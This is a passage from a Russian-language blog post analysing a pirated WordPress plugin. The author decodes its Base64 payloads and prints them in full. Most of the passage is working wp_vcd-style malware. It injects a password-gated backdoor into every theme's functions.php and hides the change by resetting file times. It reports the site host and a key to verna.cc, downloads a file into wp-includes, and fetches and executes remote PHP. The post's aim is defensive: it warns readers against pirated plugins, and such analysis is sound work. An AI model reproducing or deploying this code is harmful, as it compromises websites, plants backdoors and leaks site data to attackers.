md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping2 = true; } } } } } } if ($ping) { $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } if ($ping2) { $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } for ($i = 0; $i<MAX_LEVEL; $i++) { $dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1)); } foreach ($dirs as $dir) { foreach (@getDirList($dir) as $__) { @SearchFile($search, $__); } } foreach ($GLOBALS['DIR_ARRAY'] as $e) { //print_r($e); if ($file = file_get_contents($e[1])) { WP_URL_CD(dirname($e[1])); if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt)) { if ($salt[1] != AUTH_SALT) { // WP_URL_CD(dirname($e[1])); //echo dirname($e[1]); } } } } if ($file = @file_get_contents(__FILE__)) { $file = preg_replace('!//install_code.*//install_code_end!s', '', $file); $file = preg_replace('!<\?php\s*\?>!s', '', $file); @file_put_contents(__FILE__, $file); } } //install_code_end ?><?php error_reporting(0);?>

И не зря.

В 9 и 84 строках в глаза бросается код зашифрованный в Base64, который в 99 случаях из ста является вредоносным. Чтобы его проверить и удостовериться в этом, его можно расшифровать и проанализировать с помощью любого онлайн-сервиса. Например, Base64decode.org .

Расшифровав первый участок, получаем такой код.

<?php error_reporting(0); ini_set('display_errors', 0); $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTRcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkNCgkJCQkNCgkJCQlkZWZhdWx0OiBwcmludCAiRVJST1JfV1BfQUNUSU9OIFdQX1ZfQ0QgV1BfQ0QiOw0KCQkJfQ0KCQkJDQoJCWRpZSgiIik7DQoJfQ0KDQoJDQoNCg0KaWYgKCAhIGZ1bmN0aW9uX2V4aXN0cyggJ3RoZW1lX3RlbXBfc2V0dXAnICkgKSB7ICANCiRwYXRoPSRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUltSRVFVRVNUX1VSSV07DQppZiAoIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KZnVuY3Rpb24gZmlsZV9nZXRfY29udGVudHNfdGN1cmwoJHVybCkgew0KICAgICRjaCA9IGN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIFRSVUUpOyAgICAgICANCg0KICAgICRkYXRhID0gY3VybF9leGVjKCRjaCk7DQogICAgY3VybF9jbG9zZSgkY2gpOw0KDQogICAgcmV0dXJuICRkYXRhOw0KfQ0KDQoNCmZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpIHsNCiAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAkaGFuZGxlID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsNCiAgICBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KICAgIGZjbG9zZSgkaGFuZGxlKTsNCiAgICBpbmNsdWRlICR0bXBmbmFtZTsNCiAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOw0KfQ0KDQoNCmlmKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnZlcm5hLmNjL2NvZGU0LnBocCIpKQ0Kew0KZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQp9DQplbHNlaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNfdGN1cmwoImh0dHA6Ly93d3cudmVybmEuY2MvY29kZTQucGhwIikpDQp7DQpleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCn0NCg0KDQp9DQp9DQoNCg0KDQo/Pg=='; $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping = false; } } } } } } if ($ping) { $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt')); } if ($ping2) { $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } } ?><?php error_reporting(0);?>

Шестую строку пришлось расшифровывать еще раз, вот что оказалось там.

<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } if ( ! function_exists( 'theme_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } if($tmpcontent = @file_get_contents("http://www.verna.cc/code4.php")) { extract(theme_temp_setup($tmpcontent)); } elseif($tmpcontent = @file_get_contents_tcurl("http://www.verna.cc/code4.php")) { extract(theme_temp_setup($tmpcontent)); } } } ?>

Как видим, ничего хорошего этот скрипт не делает, а незаметно сливает данные, создает в системной директории файлы и загружает в них некий код, который тоже вряд ли принесет какую-то пользу.

Расшифровка второго участка.

<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) {</pre> if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } if ( ! function_exists( 'theme_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } if($tmpcontent = @file_get_contents("http://www.verna.cc/code4.php")) { extract(theme_temp_setup($tmpcontent)); } elseif($tmpcontent = @file_get_contents_tcurl("http://www.verna.cc/code4.php")) { extract(theme_temp_setup($tmpcontent)); } } } ?>

Дальше я изучать этот плагин не стал, а удалил его.

Напомню, бесплатные темы и плагины лучше скачивать только из официального репозитория Вордпресс:

А коммерческий софт приобретать непосредственно у разработчика или на специализированных маркетплейсах:

Всех любителей халявы хочу в очередной раз предостеречь от необдуманных действий.

Прежде чем скачать очередной пиратский плагин, тему или любой другой софт, задумайтесь о тех, кто его выкладывает в сеть. Кто эти люди, для чего они это делают, кому это выгодно, кто финансирует эти мероприятия, каковы их реальные цели.

Уверены?

Всё самое новое и интересное я публикую в своём Телеграм-канале . Подписывайтесь!

rss